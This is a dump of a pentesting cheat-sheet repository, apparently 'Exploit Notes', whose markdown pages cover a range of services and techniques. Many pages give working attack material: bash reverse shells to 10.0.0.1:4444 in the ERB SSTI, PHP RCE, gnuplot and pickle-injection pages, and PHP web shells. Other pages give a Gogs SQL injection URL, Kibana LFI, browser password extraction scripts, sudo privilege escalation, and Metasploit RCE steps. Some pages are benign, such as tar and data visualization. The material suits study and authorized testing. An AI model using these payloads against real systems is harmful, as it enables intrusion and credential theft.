[NationalSecurityAgency](https://github.com/NationalSecurityAgency/ghidra/issues/6) -------------------------------------------------------------------------------- /docs/exploit/web/elasticsearch/kibana.md: -------------------------------------------------------------------------------- 1 | # Kibana Pentesting 2 | 3 | A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601. 4 | 5 | ## Vulnerabilities 6 | 7 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13 8 | 9 | ```sh 10 | curl http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt 11 | ``` 12 | 13 | ### Remote Code Execution (RCE) Version \< 6.6.0 14 | 15 | Reference: [https://github.com/mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) 16 | -------------------------------------------------------------------------------- /docs/exploit/web/browser/extract-web-browser-passwords.md: -------------------------------------------------------------------------------- 1 | # Extract Web Browser Passwords 2 | 3 | Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data. 4 | 5 | ## Firefox 6 | 7 | ```bash 8 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py 9 | python3 firefox_decrypt.py 10 | ``` 11 | 12 |
13 | 14 | ## Google Chrome 15 | 16 | ```bash 17 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py 18 | python3 decrypt_chrome_password.py 19 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/screen.md: -------------------------------------------------------------------------------- 1 | # Sudo Screen Privilege Escalation 2 | 3 | The `sudo screen` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (root) /usr/bin/screen -r testsession 11 | ``` 12 | 13 | If we can execute **"screen"** command as root, we can spawn a root shell from the screen session. 14 | 15 | ## Exploitation 16 | 17 | First execute **"screen"** command as root, then a screen session will be start. 18 | Now we can spawn a root shell by pressing **“Ctrl+a+c”** in the screen session. -------------------------------------------------------------------------------- /docs/exploit/machine-learning/data-processing/data-visualization.md: -------------------------------------------------------------------------------- 1 | # Data Visualization for Machine Learning 2 | 3 | ## Simple Example 4 | 5 | ```py 6 | import pandas as pd 7 | import matplotlib.pyplot as plt 8 | 9 | df = pd.read_csv('example.csv', index_col=0) 10 | 11 | plt.figure(figsize=(5, 6)) 12 | 13 | # Choose a graph type 14 | plt.bar(df['Name'], df['Age'], color='red') 15 | # or 16 | plt.scatter(df['Name'], df['Age'], alpha=0.5) 17 | 18 | # Set title and labels 19 | plt.title("Example Title") 20 | plt.xlabel("Name") 21 | plt.ylabel("Age") 22 | 23 | # Display 24 | plt.show() 25 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/sql-injection.md: -------------------------------------------------------------------------------- 1 | # SQL Injection 2 | 3 | SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. 4 | 5 | ## Identify Where SQL Injection can be Performed 6 | 7 | There are many places where SQLi can be performed. For example, 8 | 9 | - URL parameters 10 | - POST parameters 11 | - HTTP request headers (Cookie, User-Agent, etc.) 12 | 13 | ## Cheat Sheet 14 | 15 | To see SQL injection cheat sheet, please refer to [this page](sql-injection-cheat-sheet.md). 16 | -------------------------------------------------------------------------------- /docs/exploit/network/grpc.md: -------------------------------------------------------------------------------- 1 | # gRPC Pentesting 2 | 3 | gRPC is a cross-platform open source high performance remote procedure call framework. Default ports are 80, 443 and the official docs example use 50051 port. 4 | 5 | ## Connect with [grpcui](https://github.com/fullstorydev/grpcui) 6 | 7 | **`grpcui`** is an interactive web UI for **gRPC**. 8 | If you don’t have `grpcui`, you need to install it. 9 | 10 | ```bash 11 | go install github.com/fullstorydev/grpcui/cmd/grpcui@latest 12 | ``` 13 | 14 | Then we can interact with gRPC. 15 | 16 | ```bash 17 | grpcui -plaintext example.com:9019 18 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/http-header-injection.md: -------------------------------------------------------------------------------- 1 | # HTTP Header Injection 2 | 3 | If the target site inserts user provided value into the response header without sanitizing, attacker may inject arbitrary key/value. 4 | 5 | ## Exploit 6 | 7 | By inserting `\r\n` (URL encoded: `%0d%0a` ), we may inject arbitrary header value in the response. 8 | 9 | ```bash 10 | # Inject "\r\nSet-Cookie: sessionid=123456" into the response header 11 | /?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456 12 | ``` 13 | 14 | ## Exploit (XSS) 15 | 16 | ```bash 17 | /?origin=example%0d%0a 18 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/pgp.md: -------------------------------------------------------------------------------- 1 | # PGP (Pretty Good Privacy) 2 | 3 | PGP is an encryption program that provides cryptographic privacy and authentication for data communication. 4 | 5 | ## Decrypt 6 | 7 | First off, you need to format the private key to make the John to recognize it. 8 | 9 | ```sh 10 | gpg2john private.key > hash.txt 11 | ``` 12 | 13 | Crack the passphrase using John the Ripper. 14 | 15 | ```sh 16 | john --wordlist=wordlist.txt hash.txt 17 | ``` 18 | 19 | ## Decode Public Key 20 | 21 | There are some online tools. 22 | 23 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)** -------------------------------------------------------------------------------- /docs/exploit/web/erb-ssti.md: -------------------------------------------------------------------------------- 1 | # ERB SSTI 2 | 3 | ERB may be vulnerable to SSTI. 4 | 5 | ## Payloads 6 | 7 | Try the following payloads on URL path, params, input, etc. 8 | 9 | ```bash 10 | <%= 7*7 %> 11 | <%= user.username %> 12 | <%= system("whoami"); %> 13 | ``` 14 | 15 | ## Exploit 16 | 17 | If the above payloads affect responses, we can inject arbitrary code as below: 18 | 19 | ```bash 20 | <%= system("ping -c 1 10.0.0.1"); %> 21 | 22 | # Reverse Shell 23 | <%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %> 24 | ``` 25 | 26 | ## References 27 | 28 | - [TrustedSec](https://trustedsec.com/blog/rubyerb-template-injection) -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/switch-user.md: -------------------------------------------------------------------------------- 1 | # Switch User on Windows 2 | 3 | ## Runas 4 | 5 | ```bash 6 | runas /user: cmd 7 | runas /user:\ cmd 8 | ``` 9 | 10 | ## RunasCS 11 | 12 | We can spawn another shell as another user with [RunasCS](https://github.com/antonioCoco/RunasCs). 13 | First, start a listener on local machine. 14 | 15 | ```bash 16 | nc -lvnp 4444 17 | ``` 18 | 19 | Then execute the following command on target machine. 20 | Replace `10.0.0.1:4444` with your local IP and port. 21 | 22 | ```powershell 23 | RunasCs.exe cmd -r 10.0.0.1:4444 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/kerberos-tgt-cracking.md: -------------------------------------------------------------------------------- 1 | # Kerberos TGT Cracking 2 | 3 | The Kerberos Ticket-Granting Ticket (TGT) is created by the Kerberos authentication. Users can access to the network using these tickets. These are often saved as `.kirbi` extension and we may be able to crack them. 4 | 5 | ## Crack TGT 6 | 7 | First convert the TGT to the hash which can be cracked by **John The Ripper**. 8 | 9 | ```sh 10 | kirbi2john tgt.kirbi > hash.txt 11 | # or 12 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt 13 | ``` 14 | 15 | Then crack. 16 | 17 | ```sh 18 | john --wordlist=wordlist.txt hash.txt 19 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/memcache.md: -------------------------------------------------------------------------------- 1 | # Memcache Pentesting 2 | 3 | Memcached is a general-purpose distributed memory caching system. A default port is 11211. 4 | 5 | ## Communication 6 | 7 | We can communicate with memcache server using Netcat. 8 | 9 | ```bash 10 | nc -vn 11211 11 | Connection to 11211 port [tcp/*] succeeded! 12 | 13 | # Commands in nc 14 | version 15 | stats 16 | stats slabs 17 | stats items 18 | stats cachedump 0 19 | stats cachedump 1 0 20 | get 21 | ``` 22 | 23 | ## References 24 | 25 | - [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/11211-memcache) 26 | -------------------------------------------------------------------------------- /docs/exploit/web/php-rce-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | # PHP RCE Cheat Sheet 2 | 3 | ## Web Shell 4 | 5 | ```bash 6 | 7 | 8 | <%3fphp+system($_['cmd']);%3f> 9 | <%3fphp+echo+system($_['cmd']);%3f> 10 | ``` 11 | 12 | We can access to `/?cmd=whoami`. 13 | 14 | ## Reverse Shell 15 | 16 | ```bash 17 | & /dev/tcp/10.0.0.1/4444 0>&1');?> 18 | & /dev/tcp/10.0.0.1/4444 0>&1"');?> 19 | <%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f> 20 | <%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f> 21 | ``` -------------------------------------------------------------------------------- /docs/exploit/email/imap.md: -------------------------------------------------------------------------------- 1 | # IMAP (Internet Message Access Protocol) Pentesting 2 | 3 | IMAP is an internet standard protocol used by email clients. Default ports are 143, 993. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script imap-capabilities -p 143 9 | ``` 10 | 11 | ### Banner Grabbing 12 | 13 | ```sh 14 | nc -nv 143 15 | openssl s_client -connect :993 -quiet 16 | ``` 17 | 18 | ## Connect 19 | 20 | ```bash 21 | telnet 10.0.0.1 143 22 | ``` 23 | 24 | ## Commands 25 | 26 | ```bash 27 | # Login 28 | a1 login "" "" 29 | 30 | # Logout 31 | a1 logout 32 | 33 | # Close mailbox 34 | a1 close 35 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/tool/socks-proxy-in-burpsuite.md: -------------------------------------------------------------------------------- 1 | # SOCKS Proxy in Burp Suite 2 | 3 | If we want to use SOCKS proxy in Burp Suite, we can add it in the proxy setting. 4 | 5 | ## Setup SOCKS Proxy 6 | 7 | 1. In **Burp Suite**, go to **Proxy → Proxy settings**. 8 | 2. In the settings window, select **User** tab and go to **Netwotk → Connections** in left pane. 9 | 3. In the **SOCKS** proxy section, enable **"Override options for this project only"**. 10 | 4. Fill proxy host and port as follow: 11 | 12 | ```bash 13 | SOCKS proxy host: 127.0.0.1 14 | SOCKS proxy port: 9251 15 | ``` 16 | 17 | 5. Check **"Use SOCKS proxy"** and close the window. -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | babel==2.17.0 2 | backrefs==5.9 3 | certifi==2025.7.14 4 | charset-normalizer==3.4.2 5 | click==8.2.1 6 | colorama==0.4.6 7 | ghp-import==2.1.0 8 | idna==3.10 9 | Jinja2==3.1.6 10 | Markdown==3.8.2 11 | MarkupSafe==3.0.2 12 | mergedeep==1.3.4 13 | mkdocs==1.6.1 14 | mkdocs-get-deps==0.2.0 15 | mkdocs-material==9.6.16 16 | mkdocs-material-extensions==1.3.1 17 | packaging==25.0 18 | paginate==0.5.7 19 | pathspec==0.12.1 20 | platformdirs==4.3.8 21 | Pygments==2.19.2 22 | pymdown-extensions==10.16 23 | python-dateutil==2.9.0.post0 24 | PyYAML==6.0.2 25 | pyyaml_env_tag==1.1 26 | requests==2.32.4 27 | six==1.17.0 28 | urllib3==2.5.0 29 | watchdog==6.0.0 30 | -------------------------------------------------------------------------------- /docs/exploit/network/wifi/wifi-password-recovery.md: -------------------------------------------------------------------------------- 1 | # WiFi Password Recovery 2 | 3 | If we forget WiFi password, we may be able to recover password from the history. 4 | 5 | ## Windows 6 | 7 | Open Command Prompt as Administrator and then execute the following commands: 8 | 9 | ```sh 10 | # Show all network names you've accessed and saved 11 | netsh wlan show profile 12 | 13 | # Show the details of the specific network including password 14 | netsh wlan show profile name="network-name" key=clear 15 | ``` 16 | 17 | ## Linux 18 | 19 | ```sh 20 | ls -al /etc/NetworkManager/system-connections/ 21 | cat /etc/NetworkManager/system-connections/example.nmconnection 22 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/telnet.md: -------------------------------------------------------------------------------- 1 | # Telnet Pentesting 2 | 3 | Telnet is an application protocol used on the internet or local area network. A default port is 23. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script telnet-encryption -p 23 9 | nmap --script telnet-ntlm-info -p 23 10 | nmap --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=8s -p 23 11 | ``` 12 | 13 | ## Configuration Files 14 | 15 | ```bash 16 | cat /etc/inetd.conf 17 | # or 18 | cat /etc/xinetd.d/telnet 19 | ``` 20 | 21 | ## Connect 22 | 23 | ```sh 24 | telnet 25 | telnet 23 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/gnuplot.md: -------------------------------------------------------------------------------- 1 | # Gnuplot Privilege Escalation 2 | 3 | The `gnuplot` command is a command-line and GUI program that can generate two- and three-dimentional plots of functions, data, and data fits. 4 | 5 | ## Command Execution 6 | 7 | The script file of **`gnuplot`** can be used to execute system commands as below. 8 | 9 | ```bash 10 | gnuplot test.plt 11 | ``` 12 | 13 | Contents of the **`.plt`** is like the following. 14 | 15 | ```bash 16 | system "whoami" 17 | 18 | # Reverse shell 19 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" 20 | ``` 21 | 22 | ## References 23 | 24 | - [Gnuplot Docs](http://gnuplot.info/docs_5.5/loc18483.html) -------------------------------------------------------------------------------- /docs/exploit/web/framework/blazor.md: -------------------------------------------------------------------------------- 1 | # Blazor Pentesting 2 | 3 | Blazor is a web framework for building interactive web applications using C# instead of JavaScript. 4 | 5 | ## Common Directories/Files 6 | 7 | ```bash 8 | # This file contains paths of DLLs that can be reversed. 9 | /_framework/blazor.boot.json 10 | /_framework/.dll 11 | ``` 12 | 13 | ## Reverse Engineering DLLs 14 | 15 | We can reverse DLLs such as `/_framework/.dll` using tools such as **DotPeek** for retrieving sensitive information (credentials, software versions, etc.). 16 | 17 | If you use DotPeek, right-click on the name in Assembly Explorer and click **Decompiled Sources** for investigation. -------------------------------------------------------------------------------- /docs/exploit/web/wkhtmltopdf-ssrf.md: -------------------------------------------------------------------------------- 1 | # wkhtmltopdf SSRF 2 | 3 | wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF. 4 | 5 | ## Exploitation 6 | 7 | Create a PHP payload to read local file. 8 | 9 | ```php 10 | 11 | ``` 12 | 13 | Then start web server in local machine. 14 | 15 | ```bash 16 | php -S 0.0.0.0:8000 17 | ``` 18 | 19 | Send request to where wkhtmltopdf is affected. For example, 20 | 21 | ```bash 22 | /htmltopdf?item= 23 | ``` 24 | 25 | Now we can see the system users list via a generated PDF. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/doas.md: -------------------------------------------------------------------------------- 1 | # Doas Privilege Escalation 2 | 3 | `doas` executes arbitrary commands as another user. It's similar to sudo command. doas.conf is interesting to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | First of all, search location of doas.conf. 8 | 9 | ```sh 10 | find / -type f -name "doas.conf" 2>/dev/null 11 | ``` 12 | 13 | Next check the configuration. 14 | 15 | ```sh 16 | doas -C /path/to/doas.conf 17 | doas -C /etc/doas.conf 18 | # or 19 | cat /etc/doas.conf 20 | ``` 21 | 22 | Execute doas as below. 23 | 24 | ```sh 25 | doas -u root 26 | ``` 27 | 28 | Please also refer to [GTFOBins](https://gtfobins.github.io/) to PrivEsc. 29 | -------------------------------------------------------------------------------- /docs/exploit/database/sqlite.md: -------------------------------------------------------------------------------- 1 | # SQLite Pentesting 2 | 3 | ## Interpreter 4 | 5 | ```sh 6 | sqlite3 sample.db 7 | sqlite3 sample.sqlite 8 | sqlitebrowser sample.db 9 | ``` 10 | 11 | ## Commands 12 | 13 | ```sh 14 | # Help 15 | sqlite> .help 16 | 17 | # Show databases 18 | sqlite> .databases 19 | 20 | # Show tables 21 | sqlite> .tables 22 | 23 | # Show table information 24 | sqlite> PRAGMA table_info(table_name); 25 | 26 | # Dump contents of tables 27 | sqlite> .dump 28 | 29 | # SQL commands to display values in the table 30 | sqlite> SELECT * FROM
; 31 | # Display values in Hex 32 | sqlite> SELECT HEX(column_name) FROM
; 33 | 34 | # Exit the interpreter 35 | sqlite> .quit 36 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/shell/reverse-shell-using-pwncat.md: -------------------------------------------------------------------------------- 1 | # Reverse Shell using Pwncat 2 | 3 | Pwncat is a reverse and bind shell handler. 4 | It can be downloaded from [here](https://pwncat.org/). 5 | For listening from remote connection, run the following command. 6 | 7 | ```bash 8 | pwncat-cs -lp 4444 9 | 10 | # For Windows target 11 | pwncat-cs -m windows -lp 4444 12 | ``` 13 | 14 | ## Commands 15 | 16 | After reverse connecting, we can execute commands either local or remote. 17 | 18 | ```bash 19 | # Switch between Local and Remote shell 20 | Ctrl+D 21 | 22 | # Upload a file to target machine (e.g. upload example.txt from local to remote) 23 | (local) upload ./example.txt /tmp/example.txt 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/cms/subrion.md: -------------------------------------------------------------------------------- 1 | # Subrion CMS Pentesting 2 | 3 | Subrion is a content management system (CMS). 4 | 5 | ## File Upload to Reverse Shell (Credential Required) 6 | 7 | ### 1. Download Reverse Shell Payload 8 | 9 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). And change the file extension to **'.phar'**. 10 | Then start a listener. 11 | 12 | ```sh 13 | nc -lvnp 4444 14 | ``` 15 | 16 | ### 2. Upload the Payload in Subrion Panel 17 | 18 | 1. **Login** 19 | 20 | 2. **Move to Content -> Uploads in Panel** 21 | 22 | 3. **Upload reverse-shell.phar** 23 | 24 | 4. **Access to /subrion/upload/reverse-shell.phar** 25 | 26 | Now you may get a shell. -------------------------------------------------------------------------------- /docs/exploit/web/elasticsearch/index.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch Pentesting 2 | 3 | It is a search engine based on the Lucene library. Default ports are 9200, 9300. 4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:elasticadmin 9 | elastic:changeme 10 | ``` 11 | 12 | ## Brute Force Credentials 13 | 14 | Crack the "Authorization" header in the web page. 15 | 16 | ```sh 17 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get / 18 | ``` 19 | 20 | ## Common Directories 21 | 22 | ```bash 23 | /_cat/ 24 | /_cat/indices 25 | /_cluster/ 26 | /_nodes/ 27 | /_remote/ 28 | /_security 29 | /_search?q=username 30 | /_search?q=password 31 | /_security/role 32 | /_security/user 33 | /_xpack/security/user/ 34 | ``` -------------------------------------------------------------------------------- /docs/disclaimer.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | 3 | Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. 4 | This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. 5 | Please use the contents at your own risk. 6 | 7 | The contents are not original, but based on the information on the internet, the author actually tried and functioned. 8 | Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new. 9 | 10 | I'm not a security expert, just an enthusiast, so the contents written are not necessarily accurate. 11 | -------------------------------------------------------------------------------- /docs/exploit/network/shell/fully-interactive-tty.md: -------------------------------------------------------------------------------- 1 | # Upgrade to Fully Interactive TTY 2 | 3 | After reverse shell, the shell has poorly functions, so we can upgrade to more functional shell. 4 | 5 | ## Upgrade 6 | 7 | After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant. 8 | 9 | ```sh 10 | python3 -c 'import pty; pty.spawn("/bin/bash")' 11 | # or 12 | python -c 'import pty; pty.spawn("/bin/bash")' 13 | # or 14 | python2 -c 'import pty; pty.spawn("/bin/bash")' 15 | # or 16 | SHELL=/bin/bash script -q /dev/null 17 | ``` 18 | 19 | The commands below make our shell even more perfect. 20 | 21 | ```sh 22 | Ctrl+z 23 | stty raw -echo;fg 24 | Enter x2 25 | export TERM=xterm 26 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/model/pickle-code-injection.md: -------------------------------------------------------------------------------- 1 | # Pickle Code Injection 2 | 3 | ## Exploit 4 | 5 | ```bash 6 | fickling --inject "import os; os.system('/bin/bash')" example.pkl 7 | 8 | # Reverse shell (replace "10.0.0.1" and 4444 with your own) 9 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl 10 | ``` 11 | 12 | ## References 13 | 14 | - [fickling](https://github.com/trailofbits/fickling) 15 | - [The Trail of Bits Blog](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) 16 | - [The Hacker News](https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html) 17 | -------------------------------------------------------------------------------- /docs/exploit/web/insecure-deserialization.md: -------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | Insecure Deserialization is the exploitation of vulnerabilities in the deserialization process of a computer system to execute unauthorized code, gain access to sensitive information, or perform other malicious actions. 4 | 5 | ## PHP Gadget Chains 6 | 7 | ### PHPGGC 8 | 9 | **[PHPGGC](https://github.com/ambionics/phpggc)** is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. 10 | 11 | ```sh 12 | phpggc -l 13 | ``` 14 | 15 | ## Ysoserial 16 | 17 | **[Ysoserial](https://github.com/frohoff/ysoserial)** is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. -------------------------------------------------------------------------------- /docs/exploit/database/couchdb.md: -------------------------------------------------------------------------------- 1 | # CouchDB Pentesting 2 | 3 | Apache CouchDb is a document-oriented NoSQL database. Default ports are 5984, 6984. 4 | 5 | ## Directories 6 | 7 | ```sh 8 | # List all databases 9 | /_all_dbs 10 | 11 | # Show information of the database 12 | / 13 | 14 | # Futon administration interface 15 | /_utils/ 16 | # Temporary View 17 | /_utils/database.html?/_temp_view 18 | ``` 19 | 20 | ## Basic Operations 21 | 22 | ```sh 23 | # Create a new database 24 | curl -X PUT https://example.com:5984/ 25 | 26 | # Delete a database 27 | curl -X DELETE https://example.com:5984/ 28 | ``` 29 | 30 | ## References 31 | 32 | - [CouchDB Guide](https://guide.couchdb.org/draft/tour.html) -------------------------------------------------------------------------------- /docs/exploit/web/webmin.md: -------------------------------------------------------------------------------- 1 | # Webmin Pentesting 2 | 3 | Webmin is a web-based system administration tool for Unix. The default port is 10000. 4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:admin 9 | ``` 10 | 11 | ## password_chagne.cgi Command Injection version=1.890 12 | 13 | ```sh 14 | msfconsole 15 | msf> use exploit/linux/http/webmin_backdoor 16 | msf> set rhosts 17 | msf> set lhost 18 | msf> run 19 | shell 20 | ``` 21 | 22 | ## Remote Code Execution (RCE) version\<2.37 23 | 24 | Webmin version\<2.37 is vulnerable to remote code execution. 25 | Download the payload . 26 | 27 | ```sh 28 | git clone https://github.com/MuirlandOracle/CVE-2019-15107 29 | cd CVE-2019-15107 30 | python3 CVE-2019-15107.py 31 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/umount.md: -------------------------------------------------------------------------------- 1 | # Sudo Umount Privilege Escalation 2 | 3 | The `sudo umount` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) NOPASSWD: /bin/umount 11 | ``` 12 | 13 | If we can execute umount command as root, we can escalate to privilege. 14 | 15 | ## Exploitation 16 | 17 | In target machine, check what directory is mounted. 18 | 19 | ```bash 20 | cat /etc/fstab 21 | showmount -e localhost 22 | ``` 23 | 24 | Assume the **`/opt/example`** folder is mounted. 25 | If we unmount this folder, original files, that existed before the directory is mounted, may appear. 26 | 27 | ```bash 28 | sudo /bin/umount /opt/example 29 | ls -al /opt/example 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/version-control/git/gogs.md: -------------------------------------------------------------------------------- 1 | # Gogs Pentesting 2 | 3 | Gogs (Go Git Service) is a painless self-hosted Git Service. 4 | 5 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238)) 6 | 7 | ```txt 8 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- 9 | ``` 10 | 11 | ### Automation 12 | 13 | ```bash 14 | sqlmap -u "https://example.com/api/v1/repos/search?q=test" 15 | sqlmap -u "https://example.com/api/v1/users/search?q=test" 16 | ``` 17 | 18 | ## Git Hooks Remote Code Execution (RCE) 19 | 20 | ```bash 21 | msfconsole 22 | msf> use exploit/multi/http/gogs_git_hooks_rce 23 | msf> (set options...) 24 | msf> run 25 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/read-pt.md: -------------------------------------------------------------------------------- 1 | # Read PT File 2 | 3 | A PT file is a machine learning model file generated by PyTorch. 4 | 5 | ## Load Model from PT 6 | 7 | ```python 8 | import torch 9 | import torch.nn as nn 10 | 11 | class ExampleModel(nn.Module): 12 | def __init__(self): 13 | super().__init__() 14 | self.flatten = nn.Flatten() 15 | self.linear_relu_stack = nn.Sequential( 16 | nn.Linear(28*28, 512), 17 | nn.ReLU(), 18 | nn.Linear(512, 10)) 19 | 20 | def forward(self, x): 21 | x = self.flatten(x) 22 | logits = self.linear_relu_stack(x) 23 | return logits 24 | 25 | model = ExampleModel() 26 | model.load_state_dict(torch.load('example.pt')) 27 | print(model) 28 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/rust.md: -------------------------------------------------------------------------------- 1 | # Rust Privilege Escalation 2 | 3 | Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have a write permission of a Rust file, we may be able to inject arbitrary code to escalate privileges. 4 | 5 | ## Reverse Shell 6 | 7 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs 8 | 9 | We can create a binary or module to reverse shell. 10 | 11 | ```bash 12 | cd /path/to/rust/project/src 13 | vim lib.rs 14 | (In vim editor, insert a reverse shell code into a file) 15 | cargo build 16 | ``` 17 | 18 | ## References 19 | 20 | - [HackTricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) 21 | -------------------------------------------------------------------------------- /docs/exploit/web/cms/mara.md: -------------------------------------------------------------------------------- 1 | # Mara CMS Pentesting 2 | 3 | Mara CMS is a file based content management system. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:changeme 9 | ``` 10 | 11 | ## Remote Code Execution (RCE) v7.5 12 | 13 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780) 14 | 15 | ### Automation 16 | 17 | ```bash 18 | msfconsole 19 | msf> use exploit/multi/http/maracms_upload_exec 20 | msf> set rhosts 21 | msf> set lhost 22 | msf> set srvhost 23 | msf> set srvport 24 | msf> set targeturi /path/to/maracms/ 25 | msf> set targeturipath /path/to/maracms/ 26 | ``` 27 | 28 | ## References 29 | 30 | - [Exploit DB](https://www.exploit-db.com/exploits/48780) 31 | -------------------------------------------------------------------------------- /docs/exploit/archives/tar.md: -------------------------------------------------------------------------------- 1 | # Tar 2 | 3 | Tar command is a utility that is used to create, manipulate, and extract archived files. "tar" stands for "tape archive". 4 | 5 | ## Archive Files 6 | 7 | ```sh 8 | # -c: Create a new archive 9 | # -f: Use archive file 10 | tar -cf archive.tar example.txt 11 | tar -cf archive.tar example1.txt example2.txt 12 | # -z: filter the archive through gzip 13 | tar -zcf example.tar.gz example/ 14 | ``` 15 | 16 | ## Extract Files 17 | 18 | ```sh 19 | # -x: Extract files from an archive 20 | # -f: Use archive file 21 | tar -xf archive.tar 22 | tar -xf archive.tar.gz 23 | # output given directory 24 | tar -xf archive.tar --directory archived 25 | ``` 26 | 27 | ## Display Contents without Extracting 28 | 29 | ```sh 30 | tar -tf archive.tar 31 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/port-forwarding/plink.md: -------------------------------------------------------------------------------- 1 | # Port Forwarding using Plink 2 | 3 | Plink is a Windows command line version of the PuTTY SSH client. 4 | 5 | ## Reverse Connection 6 | 7 | ### 1. Open Lisnter in Your Local Machine 8 | 9 | ```sh 10 | nc -lvnp 4444 11 | ``` 12 | 13 | ### 2. Run Reverse Connection in Target Machine 14 | 15 | First of all, generate SSH keys. Two keys (public and private) will be generated. 16 | 17 | ```sh 18 | ssh-keygen 19 | ``` 20 | 21 | Convert the private key for Windows. 22 | 23 | ```sh 24 | puttygen private_key -o private_key.ppk 25 | ``` 26 | 27 | Run reverse connection using plink. 28 | 29 | ```powershell 30 | cmd.exe /c echo y | .\plink.exe -R :: attacker@ -i private_key.ppk -N 31 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/protocol/ntp.md: -------------------------------------------------------------------------------- 1 | # NTP (Network Time Protocol) Pentesting 2 | 3 | NTP is a networking protocol for clock synchronization between computer systems over packet-switched. Default port is 123. It uses UDP. 4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap -sU --script ntp-info -p 123 9 | nmap -sU --script ntp-monlist -p 123 10 | nmap -sU --script ntp* -p 123 11 | nmap -sU --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 12 | ``` 13 | 14 | ### Ntpq 15 | 16 | ```sh 17 | ntpq -c readlist 18 | ntpq -c readvar 19 | ntpq -c peers 20 | ntpq -c associations 21 | ntpdc -c monlist 22 | ntpdc -c listpeers 23 | ntpdc -c sysinfo 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/key-derivation-functions/scrypt.md: -------------------------------------------------------------------------------- 1 | # Scrypt 2 | 3 | Scrypt is a password-based key derivation function. 4 | 5 | ## Using Scrypt in Python 6 | 7 | We can use scrypt easily thanks of Pycryptodome. 8 | We need to install it first. 9 | 10 | ```python 11 | pip install pycryptodome 12 | 